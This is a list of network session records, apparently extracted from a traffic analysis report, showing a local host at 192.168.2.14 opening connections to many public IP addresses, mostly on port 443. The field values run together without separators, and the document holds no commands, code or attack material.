                                                      14722192.168.2.145461234.43.162.1168080
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14723192.168.2.143601219.17.239.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14724192.168.2.144303638.205.34.64443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14725192.168.2.144728661.67.207.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14726192.168.2.145484664.199.146.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14727192.168.2.1440790100.48.203.109443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14728192.168.2.1436434204.193.125.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14729192.168.2.1453528156.244.76.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14730192.168.2.1435506175.107.215.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14731192.168.2.1433196110.68.43.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14732192.168.2.14578244.122.239.193443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14733192.168.2.1435362141.180.255.140443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14734192.168.2.1435810160.201.157.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14735192.168.2.1437832116.20.183.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14736192.168.2.144546446.202.221.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14737192.168.2.1458490143.18.66.62443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14738192.168.2.1433452142.179.198.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14739192.168.2.144850895.149.229.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14740192.168.2.1450946209.78.90.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14741192.168.2.1446770106.48.181.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14742192.168.2.1441950178.135.148.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14743192.168.2.1456750180.78.138.143443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14744192.168.2.1436216158.36.149.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14745192.168.2.145973212.103.200.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14746192.168.2.1450400182.221.203.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14747192.168.2.1444530119.61.28.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14748192.168.2.1450818167.123.245.98443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14749192.168.2.1451854142.114.53.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14750192.168.2.1443848154.167.248.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14751192.168.2.144565838.37.65.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14752192.168.2.1458622199.84.198.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14753192.168.2.1451468143.143.36.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14754192.168.2.1434558186.252.46.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14755192.168.2.1459008169.221.33.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14756192.168.2.1446954170.98.210.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14757192.168.2.1439468133.192.122.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14758192.168.2.145345894.89.238.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14759192.168.2.145283644.76.224.116443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14760192.168.2.1451018128.47.243.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14761192.168.2.143787087.152.160.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14762192.168.2.144448247.229.242.221443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14763192.168.2.143630041.221.176.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14764192.168.2.143364625.67.207.140443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14765192.168.2.1448066110.4.140.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14766192.168.2.143584035.168.116.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14767192.168.2.143622846.128.237.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14768192.168.2.145639481.133.18.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14769192.168.2.145423292.25.241.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14770192.168.2.145546240.180.216.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14771192.168.2.144389279.157.12.176443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14772192.168.2.1459122182.56.19.101443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14773192.168.2.143785212.15.111.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14774192.168.2.1455194159.212.63.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14775192.168.2.1452522196.34.10.248443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14776192.168.2.1460264207.172.191.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14777192.168.2.1455662173.246.28.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14778192.168.2.1440998207.226.153.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14779192.168.2.144776464.123.42.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14780192.168.2.143958088.205.55.185443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14781192.168.2.1457922105.125.208.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14782192.168.2.1459668114.210.234.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14783192.168.2.1448236191.78.133.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14784192.168.2.1442598114.240.237.139443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14785192.168.2.144965224.220.252.176443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14786192.168.2.1445734186.102.53.24443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14787192.168.2.143982866.40.130.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14788192.168.2.1449208196.248.130.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14789192.168.2.1452336210.89.93.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14790192.168.2.145035669.80.140.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14791192.168.2.1444734219.243.47.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14792192.168.2.14469561.209.133.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14793192.168.2.145237295.0.114.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14794192.168.2.144956418.34.52.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14795192.168.2.1441548129.69.99.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14796192.168.2.14480404.87.0.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14797192.168.2.1435574203.241.3.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14798192.168.2.1440506119.73.112.167443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14799192.168.2.1453166173.94.173.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14800192.168.2.145271642.102.100.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14801192.168.2.1436706168.114.108.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14802192.168.2.143469284.199.70.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14803192.168.2.1443278195.36.233.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14804192.168.2.1460256126.53.9.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14805192.168.2.1435350191.131.145.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14806192.168.2.143338074.48.184.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14807192.168.2.145060013.50.242.143443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14808192.168.2.144558023.64.63.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14809192.168.2.143405012.248.251.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14810192.168.2.1456806199.96.214.209443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14811192.168.2.1445848142.20.221.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14812192.168.2.144825651.74.19.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14813192.168.2.1460202139.109.134.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14814192.168.2.145381484.247.145.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14815192.168.2.145054252.44.247.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14816192.168.2.14439168.177.85.110443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14817192.168.2.1438688115.98.97.226443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14818192.168.2.1458654121.220.232.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14819192.168.2.144000418.234.182.16443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14820192.168.2.143856889.204.172.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14821192.168.2.1446154218.122.206.156443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14822192.168.2.143594253.118.93.34443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14823192.168.2.1448996183.117.180.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14824192.168.2.14542368.95.177.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14825192.168.2.144394275.118.240.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14826192.168.2.144898893.216.219.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14827192.168.2.146040664.81.60.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14828192.168.2.1443258192.218.18.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14829192.168.2.1432952149.92.158.41443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14830192.168.2.1460722201.65.224.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14831192.168.2.1451152198.123.143.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14832192.168.2.1452796110.18.158.110443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14833192.168.2.145372897.250.219.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14834192.168.2.1436192141.54.181.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14835192.168.2.1444990109.82.225.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14836192.168.2.1458780217.241.26.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14837192.168.2.1434586137.238.87.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14838192.168.2.145942259.19.16.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14839192.168.2.14469725.23.13.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14840192.168.2.1460482108.206.176.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14841192.168.2.1454346138.208.176.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14842192.168.2.144220454.49.48.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14843192.168.2.1433220123.25.30.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14844192.168.2.1452588207.205.231.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14845192.168.2.1456840222.146.104.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14846192.168.2.144960213.131.186.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14847192.168.2.1443136116.155.177.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14848192.168.2.1454950146.103.101.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14849192.168.2.1433812218.44.6.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14850192.168.2.1451080139.88.101.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14851192.168.2.145741245.9.216.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14852192.168.2.1448796133.9.207.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14853192.168.2.144918017.154.38.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14854192.168.2.1432850188.101.80.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14855192.168.2.1456252101.246.252.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14856192.168.2.1445592115.45.200.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14857192.168.2.144235873.144.28.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14858192.168.2.1452280155.221.221.78443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14859192.168.2.1436826174.110.105.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14860192.168.2.1434024185.93.16.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14861192.168.2.144285465.255.76.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14862192.168.2.144290486.200.97.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14863192.168.2.1450970191.239.143.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14864192.168.2.1434176203.72.45.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14865192.168.2.1435720202.56.77.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14866192.168.2.1434820153.70.158.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14867192.168.2.1442082205.180.169.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14868192.168.2.1437982159.79.79.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14869192.168.2.145541666.23.162.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14870192.168.2.144441218.218.137.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14871192.168.2.144211678.144.82.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14872192.168.2.144599461.63.147.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14873192.168.2.144129642.119.103.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14874192.168.2.1433220189.102.122.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14875192.168.2.1437344132.125.151.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14876192.168.2.144280893.229.188.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14877192.168.2.144443839.217.63.78443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14878192.168.2.145726634.193.118.204443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14879192.168.2.1442594103.75.26.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14880192.168.2.1433062124.237.184.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14881192.168.2.1447126130.177.45.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14882192.168.2.145449299.225.160.248443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14883192.168.2.143976862.252.249.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14884192.168.2.1446424162.244.58.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14885192.168.2.1454590137.1.79.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14886192.168.2.1459590130.36.16.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14887192.168.2.1433100203.6.218.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14888192.168.2.1459184187.137.145.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14889192.168.2.1457050141.160.147.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14890192.168.2.1438578114.53.43.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14891192.168.2.1452870156.135.145.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14892192.168.2.144155424.82.195.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14893192.168.2.1442526200.161.18.17443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14894192.168.2.1447244142.171.73.204443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14895192.168.2.1455550124.89.134.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14896192.168.2.1456018176.84.134.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14897192.168.2.1445166212.151.49.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14898192.168.2.1456318128.252.183.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14899192.168.2.145824844.211.85.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14900192.168.2.1435390184.209.216.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14901192.168.2.1444550154.161.129.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14902192.168.2.144883447.142.163.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14903192.168.2.1432962172.224.245.162443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14904192.168.2.144583696.72.197.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14905192.168.2.146052013.76.158.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14906192.168.2.1446334222.206.14.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14907192.168.2.145159058.203.31.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14908192.168.2.144056023.154.140.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14909192.168.2.1441696114.9.135.78443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14910192.168.2.1460972171.64.168.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14911192.168.2.1445948188.52.224.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14912192.168.2.1445664112.18.39.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14913192.168.2.1448302132.78.182.34443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14914192.168.2.144349879.20.59.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14915192.168.2.145061014.118.174.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14916192.168.2.145491647.214.212.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14917192.168.2.1458662205.229.62.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14918192.168.2.143364093.83.47.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14919192.168.2.1445034161.141.175.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14920192.168.2.1445824106.200.199.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14921192.168.2.1447200137.162.132.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14922192.168.2.1460336118.25.134.44443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14923192.168.2.1434032219.143.60.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14924192.168.2.1437392118.26.163.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14925192.168.2.1448632185.181.85.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14926192.168.2.1434212172.164.190.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14927192.168.2.144008090.45.50.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14928192.168.2.145786878.139.51.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14929192.168.2.145622850.25.47.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14930192.168.2.144548492.143.252.98443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14931192.168.2.145300895.30.154.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14932192.168.2.1438414142.87.197.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14933192.168.2.1458950151.107.180.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14934192.168.2.144763085.187.39.246443
